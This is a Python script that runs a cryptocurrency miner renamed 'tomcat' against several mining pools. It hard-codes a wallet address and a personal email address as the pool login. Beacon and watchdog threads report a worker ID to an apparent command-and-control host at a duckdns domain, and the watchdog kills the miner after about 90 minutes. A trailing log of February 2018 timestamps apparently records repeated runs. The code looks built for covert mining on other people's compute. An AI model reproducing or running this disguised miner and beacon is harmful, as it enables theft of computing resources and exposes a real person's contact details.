import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:06.143439
#2018-02-17 16:15:01.698867
#2018-02-17 18:02:06.327977
#2018-02-17 19:50:01.705981
#2018-02-17 21:38:02.149506
#2018-02-17 23:22:01.686210
#2018-02-18 01:09:03.868659
#2018-02-18 02:57:04.348717
#2018-02-18 04:47:05.036115
#2018-02-18 06:39:05.040316
#2018-02-18 08:27:07.347283
#2018-02-18 10:15:02.354510
#2018-02-18 12:01:01.844596
#2018-02-18 13:46:01.922689
#2018-02-18 15:34:05.045820
#2018-02-18 17:22:04.112249
#2018-02-18 19:10:06.820441
#2018-02-18 20:57:01.561240
#2018-02-18 22:44:01.879046
#2018-02-19 00:33:01.595053
#2018-02-19 02:18:02.131881
#2018-02-19 04:06:01.566324
#2018-02-19 05:50:09.842928
#2018-02-19 07:40:01.670748
#2018-02-19 09:29:07.163380
#2018-02-19 11:19:01.787480
#2018-02-19 13:07:07.633171
#2018-02-19 14:55:02.190890
#2018-02-19 16:44:01.881419
#2018-02-19 18:32:05.511318
#2018-02-19 20:19:05.244287
#2018-02-19 22:08:06.534129
#2018-02-19 23:55:02.048860
#2018-02-20 01:42:05.584974
#2018-02-20 03:30:10.806636
#2018-02-20 05:17:05.654581
#2018-02-20 07:01:01.532284
#2018-02-20 08:47:01.924066
#2018-02-20 10:31:08.505481
#2018-02-20 12:16:03.923568
#2018-02-20 14:03:08.805826
#2018-02-20 15:46:04.851297
#2018-02-20 17:34:09.379549
#2018-02-20 19:23:04.901218
#2018-02-20 21:11:03.112637
#2018-02-20 22:57:08.966920
#2018-02-21 00:41:01.782128
#2018-02-21 02:27:02.580945
#2018-02-21 04:16:01.559246
#2018-02-21 06:02:09.442499
#2018-02-21 07:50:09.009557
#2018-02-21 09:36:04.598337
#2018-02-21 11:23:06.685857
#2018-02-21 13:13:05.186536
#2018-02-21 15:00:01.860160
#2018-02-21 16:49:05.420736
#2018-02-21 18:33:04.048328
#2018-02-21 20:19:04.159113
#2018-02-21 22:08:05.898991
#2018-02-21 23:56:07.979070
#2018-02-22 01:44:04.691903
#2018-02-22 03:32:06.906882
#2018-02-22 05:20:04.103031
#2018-02-22 07:05:08.929421
#2018-02-22 08:52:04.560747
#2018-02-22 10:39:06.741623
#2018-02-22 12:25:02.637271
#2018-02-22 14:10:08.494614
#2018-02-22 15:58:11.420172
#2018-02-22 17:45:07.506225
#2018-02-22 19:31:08.508683
#2018-02-22 21:23:05.879103
#2018-02-22 23:08:01.770915
#2018-02-23 00:56:01.341050
#2018-02-23 02:43:04.075976
#2018-02-23 04:32:04.101737
#2018-02-23 06:18:05.733269
#2018-02-23 08:04:08.076149
#2018-02-23 10:19:06.135821
#2018-02-23 12:13:08.797488
#2018-02-23 14:01:01.381191
#2018-02-23 15:52:09.239009
#2018-02-23 17:37:04.477245
#2018-02-23 19:25:08.158573
#2018-02-23 21:10:09.503345
#2018-02-23 22:56:05.487328
#2018-02-24 00:44:04.540424
#2018-02-24 02:38:03.382470
#2018-02-24 04:33:02.144430
#2018-02-24 06:18:01.311082
#2018-02-24 08:05:08.209588
#2018-02-24 09:51:04.790027
#2018-02-24 11:46:07.064293
#2018-02-24 13:37:04.549657
#2018-02-24 15:25:03.089970
#2018-02-24 17:14:03.933684
#2018-02-24 19:06:01.287581
#2018-02-24 20:54:03.997619
#2018-02-24 23:18:07.001083
#2018-02-25 02:43:03.412472
#2018-02-25 06:22:01.476550
#2018-02-25 11:39:06.495727